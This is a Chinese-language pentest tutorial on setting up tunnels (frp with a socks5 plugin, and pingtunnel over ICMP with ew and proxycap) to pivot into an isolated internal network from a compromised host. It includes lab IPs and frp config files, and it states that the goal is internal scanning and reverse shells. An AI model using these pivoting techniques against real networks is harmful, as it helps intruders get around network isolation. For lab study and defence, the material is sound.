前言

        在渗透过程中拿到主机权限后，下一步通常是进行内网横向，而企业内网在不出网的情况下，我们无法直接进行扫描、反弹shell等操作，这时候就需要搭建隧道来进行数据包转发，使我们能间接的与内网进行通信。

常用隧道技术

frp隧道搭建

测试环境：

物理机：192.168.0.121

kali：192.168.0.123

centos：192.168.0.122   192.168.159.131

win7：192.168.159.128

工具：proxycap+frp

先行下载frp到vps和Linux中，frpc为客户端相关程序以及配置文件，frps为服务端相关程序以及配置文件，以下为frps.ini和frpc.ini的配置

kali配置：
[common]
bind_addr = 0.0.0.0 #服务端监听地址
bind_port = 7000 #服务端默认监听端口
 
centos配置：
[common]
server_addr = 192.168.0.123
server_port = 7000
[http_proxy]
type = tcp
local_ip = 192.168.159.131
remote_port = 4444
plugin = socks5

分别在服务端和客户端执行程序 

 在物理机添加socks5代理，并且配置规则启用代理

使用物理机成功扫描内网

 pingtunnel隧道搭建

测试环境：

kali:192.168.0.123

centos:192.168.0.122   192.168.159.131

工具：pingtunnel+ew+proxycap

将程序上传至vps和靶机，并执行程序

开启pingtunnel服务，客户端将本地3333端口转发至服务端5555端口

靶机将本地流量都经过3333端口转发，kali开启转接隧道，将4444收到的请求转发至5555端口 

 在物理机使用proxycap连接kali的4444代理端口即可通过隧道访问内网

 还有icmpsh、icmptunnel等端口转发工具均可用来搭建隧道，方法都是大同小异